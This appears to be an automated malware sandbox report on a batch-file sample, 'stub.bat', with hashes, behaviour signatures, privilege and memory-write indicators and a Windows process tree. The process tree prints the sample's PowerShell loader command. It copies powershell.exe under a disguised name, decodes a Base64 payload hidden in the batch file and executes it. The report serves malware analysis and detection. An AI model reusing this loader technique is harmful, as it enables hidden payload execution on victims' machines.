Analysis
max time kernel: 600s
max time network: 433s
platform: windows10-2004_x64
resource: win10v2004-20240708-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240708-en, locale:en-us, os:windows10-2004-x64, system
submitted: 08-07-2024 15:19
Static task: static1
Behavioral task: behavioral1
  Sample: stub.bat
  Resource: win7-20240708-en
Behavioral task: behavioral2
  Sample: stub.bat
  Resource: win10v2004-20240708-en
Behavioral task: behavioral3
  Sample: stub.bat
  Resource: win11-20240704-en
General
Target: stub.bat
Size: 3.4MB
MD5: c27b8c9f05c86817d8d287f0d0bd8698
SHA1: 239748a1871a85c7df6733bc24d9497a331aca87
SHA256: cd6c05138680001d640a47ed988487797a4b77e95bff6c4f57ae57d294aa53e1
SHA512: fbd18278c1d8c18360f16cf11db634162cb7e14484853496670ca074e06cbd26f5933b9cd22046063da3f86c294c786c20a00545baa8cbdc76a6af61c55c7bca
SSDEEP: 49152:/mThC67EFbMUKiKknefnfIlTYhjwHs0j+VqdyvZWs6sT/Pj5wSe/XDX/DlbfZ5+m:n
Malware Config
Signatures
Suspicious use of NtCreateProcessExOtherParentProcess (1 IoC)
description | pid | Process | procid_target
PID 3044 created 3176 | 3044 | WerFault.exe | 80
Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
description | pid | Process | procid_target
PID 2988 created 3176 | 2988 | svchost.exe | 80
Blocklisted process makes network request (4 IoCs)
flow | pid | Process
8 | 4296 | powershell.exe
9 | 4296 | powershell.exe
10 | 4296 | powershell.exe
11 | 4296 | powershell.exe
Executes dropped EXE (1 IoC)
pid | Process
4880 | $ktm-powershell.exe
Drops file in System32 directory (4 IoCs)
description | ioc | Process
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | svchost.exe
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | svchost.exe
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.chk | DllHost.exe
pid | Process
4296 | powershell.exe
Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Enumerates system info in registry (2 TTPs, 2 IoCs)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Modifies data under HKEY_USERS (62 IoCs)
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Suspicious behavior: LoadsDriver (64 IoCs)
Suspicious use of AdjustPrivilegeToken (20 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 4296 | powershell.exe
Token: SeDebugPrivilege | 4296 | powershell.exe
Token: SeDebugPrivilege | 4296 | powershell.exe
Token: SeAuditPrivilege | 2720 | svchost.exe
Token: SeShutdownPrivilege | 3460 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3460 | Explorer.EXE
Token: SeShutdownPrivilege | 3460 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3460 | Explorer.EXE
Token: SeShutdownPrivilege | 3460 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3460 | Explorer.EXE
Token: SeShutdownPrivilege | 3460 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3460 | Explorer.EXE
Token: SeShutdownPrivilege | 3460 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3460 | Explorer.EXE
Token: SeShutdownPrivilege | 3460 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3460 | Explorer.EXE
Token: SeShutdownPrivilege | 3460 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3460 | Explorer.EXE
Token: SeShutdownPrivilege | 3460 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3460 | Explorer.EXE
Suspicious use of WriteProcessMemory (64 IoCs)
description | pid | Process | procid_target
PID 4928 wrote to memory of 4296 | 4928 | cmd.exe | 82
PID 4928 wrote to memory of 4296 | 4928 | cmd.exe | 82
PID 4296 wrote to memory of 628 | 4296 | powershell.exe | 5
PID 4296 wrote to memory of 684 | 4296 | powershell.exe | 7
PID 4296 wrote to memory of 976 | 4296 | powershell.exe | 12
PID 4296 wrote to memory of 372 | 4296 | powershell.exe | 13
PID 4296 wrote to memory of 748 | 4296 | powershell.exe | 14
PID 4296 wrote to memory of 668 | 4296 | powershell.exe | 15
PID 684 wrote to memory of 2676 | 684 | lsass.exe | 47
PID 4296 wrote to memory of 1056 | 4296 | powershell.exe | 17
PID 4296 wrote to memory of 1064 | 4296 | powershell.exe | 18
PID 4296 wrote to memory of 1140 | 4296 | powershell.exe | 19
PID 4296 wrote to memory of 1184 | 4296 | powershell.exe | 20
PID 4296 wrote to memory of 1200 | 4296 | powershell.exe | 21
PID 4296 wrote to memory of 1288 | 4296 | powershell.exe | 22
PID 4296 wrote to memory of 1372 | 4296 | powershell.exe | 23
PID 4296 wrote to memory of 1444 | 4296 | powershell.exe | 24
PID 4296 wrote to memory of 1452 | 4296 | powershell.exe | 25
PID 4296 wrote to memory of 1532 | 4296 | powershell.exe | 26
PID 4296 wrote to memory of 1600 | 4296 | powershell.exe | 27
PID 4296 wrote to memory of 1640 | 4296 | powershell.exe | 28
PID 4296 wrote to memory of 1656 | 4296 | powershell.exe | 29
PID 4296 wrote to memory of 1744 | 4296 | powershell.exe | 30
PID 4296 wrote to memory of 4880 | 4296 | powershell.exe | 88
PID 4296 wrote to memory of 4880 | 4296 | powershell.exe | 88
PID 4296 wrote to memory of 1760 | 4296 | powershell.exe | 31
PID 684 wrote to memory of 2676 | 684 | lsass.exe | 47
PID 684 wrote to memory of 2676 | 684 | lsass.exe | 47
PID 4296 wrote to memory of 1844 | 4296 | powershell.exe | 32
PID 4296 wrote to memory of 1864 | 4296 | powershell.exe | 33
PID 4296 wrote to memory of 1880 | 4296 | powershell.exe | 34
PID 4296 wrote to memory of 1960 | 4296 | powershell.exe | 35
PID 4296 wrote to memory of 2032 | 4296 | powershell.exe | 36
PID 4296 wrote to memory of 1636 | 4296 | powershell.exe | 38
PID 4296 wrote to memory of 1852 | 4296 | powershell.exe | 39
PID 4296 wrote to memory of 2160 | 4296 | powershell.exe | 40
PID 4296 wrote to memory of 2356 | 4296 | powershell.exe | 41
PID 4296 wrote to memory of 2364 | 4296 | powershell.exe | 42
PID 4296 wrote to memory of 2468 | 4296 | powershell.exe | 43
PID 4296 wrote to memory of 2504 | 4296 | powershell.exe | 44
PID 4296 wrote to memory of 2516 | 4296 | powershell.exe | 45
PID 4296 wrote to memory of 2576 | 4296 | powershell.exe | 46
PID 4296 wrote to memory of 2676 | 4296 | powershell.exe | 47
PID 4296 wrote to memory of 2720 | 4296 | powershell.exe | 48
PID 1288 wrote to memory of 4556 | 1288 | svchost.exe | 90
PID 1288 wrote to memory of 4556 | 1288 | svchost.exe | 90
PID 4296 wrote to memory of 4556 | 4296 | powershell.exe | 90
PID 684 wrote to memory of 2676 | 684 | lsass.exe | 47
PID 4296 wrote to memory of 2728 | 4296 | powershell.exe | 49
PID 4296 wrote to memory of 2748 | 4296 | powershell.exe | 50
PID 1288 wrote to memory of 972 | 1288 | svchost.exe | 91
PID 1288 wrote to memory of 972 | 1288 | svchost.exe | 91
PID 4296 wrote to memory of 972 | 4296 | powershell.exe | 91
PID 684 wrote to memory of 2676 | 684 | lsass.exe | 47
PID 4296 wrote to memory of 2756 | 4296 | powershell.exe | 51
PID 1288 wrote to memory of 2276 | 1288 | svchost.exe | 92
PID 1288 wrote to memory of 2276 | 1288 | svchost.exe | 92
PID 4296 wrote to memory of 2276 | 4296 | powershell.exe | 92
PID 4296 wrote to memory of 2876 | 4296 | powershell.exe | 52
PID 684 wrote to memory of 2676 | 684 | lsass.exe | 47
PID 4296 wrote to memory of 2928 | 4296 | powershell.exe | 53
PID 4296 wrote to memory of 3324 | 4296 | powershell.exe | 55
PID 4296 wrote to memory of 3460 | 4296 | powershell.exe | 56
PID 684 wrote to memory of 2676 | 684 | lsass.exe | 47
Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
Each entry is shown as image path | command line | PID, indented by its depth in the process tree; signature hits follow as bullets.

C:\Windows\system32\winlogon.exe | winlogon.exe | PID 628
  C:\Windows\system32\dwm.exe | "dwm.exe" | PID 372
C:\Windows\system32\lsass.exe | C:\Windows\system32\lsass.exe | PID 684
  - Suspicious use of WriteProcessMemory
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM | PID 976
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | PID 748
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts | PID 668
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService | PID 1056
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc | PID 1064
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | PID 1140
  C:\Windows\system32\taskhostw.exe | taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E} | PID 2748
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc | PID 1184
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc | PID 1200
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager | PID 1288
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\sihost.exe | sihost.exe | PID 2504
  C:\Windows\system32\sihost.exe | sihost.exe | PID 4556
  C:\Windows\system32\sihost.exe | sihost.exe | PID 972
  C:\Windows\system32\sihost.exe | sihost.exe | PID 2276
  C:\Windows\system32\sihost.exe | sihost.exe | PID 1572
  C:\Windows\system32\sihost.exe | sihost.exe | PID 1220
  C:\Windows\system32\sihost.exe | sihost.exe | PID 2544
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog | PID 1372
  - Drops file in System32 directory
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem | PID 1444
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes | PID 1452
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s nsi | PID 1532
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS | PID 1600
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp | PID 1640
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder | PID 1656
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc | PID 1744
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p | PID 1760
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm | PID 1844
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache | PID 1864
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p | PID 1880
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection | PID 1960
C:\Windows\System32\spoolsv.exe | C:\Windows\System32\spoolsv.exe | PID 2032
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository | PID 1636
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation | PID 1852
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc | PID 2160
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent | PID 2356
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT | PID 2364
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt | PID 2468
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc | PID 2516
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc | PID 2576
  - Modifies data under HKEY_USERS
C:\Windows\sysmon.exe | C:\Windows\sysmon.exe | PID 2676
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer | PID 2720
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks | PID 2728
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService | PID 2756
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker | PID 2876
C:\Windows\system32\wbem\unsecapp.exe | C:\Windows\system32\wbem\unsecapp.exe -Embedding | PID 2928
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc | PID 3324
C:\Windows\Explorer.EXE | C:\Windows\Explorer.EXE | PID 3460
  - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\stub.bat" | PID 4928
    - Suspicious use of WriteProcessMemory
    C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | PID 3176
      C:\Windows\system32\WerFault.exe | C:\Windows\system32\WerFault.exe -u -p 3176 -s 436 | PID 2948
        - Checks processor information in registry
        - Enumerates system info in registry
        - Suspicious behavior: EnumeratesProcesses
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -command "Copy-Item -Path C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Destination $env:LOCALAPPDATA\`$ktm-powershell.exe; $data = Get-Content -Path 'C:\Users\Admin\AppData\Local\Temp\stub.bat'; $lines = $data -split '\n';$last_line = $lines[-1]; $last_line = [Convert]::FromBase64String($last_line.Replace('\n', '')); $last_line = [System.Text.Encoding]::Unicode.GetString($last_line); [System.IO.File]::WriteAllText($env:LOCALAPPDATA + '\\$ktm-loader.ps1', $last_line); $last_line | iex" | PID 4296
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      C:\Users\Admin\AppData\Local\$ktm-powershell.exe | "C:\Users\Admin\AppData\Local\$ktm-powershell.exe" -ep bypass -ec [encoded command elided] | PID 4880
        - Executes dropped EXE
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc | PID 3604
C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} | PID 3776
C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding | PID 3984
C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding | PID 3888
C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding | PID 2124
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc | PID 3428
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV | PID 4988
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc | PID 4552
  - Modifies data under HKEY_USERS
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service | PID 1712
  - Modifies data under HKEY_USERS
C:\Windows\system32\SppExtComObj.exe | C:\Windows\system32\SppExtComObj.exe -Embedding | PID 4088
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager | PID 380
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc | PID 2820
C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} | PID 4888
  - Drops file in System32 directory
C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding | PID 3496
C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding | PID 2920
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k WerSvcGroup | PID 2988
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious behavior: EnumeratesProcesses
  C:\Windows\system32\WerFault.exe | C:\Windows\system32\WerFault.exe -pss -s 556 -p 3176 -ip 3176 | PID 3044
    - Suspicious use of NtCreateProcessExOtherParentProcess
Network
MITRE ATT&CK Enterprise v15
Downloads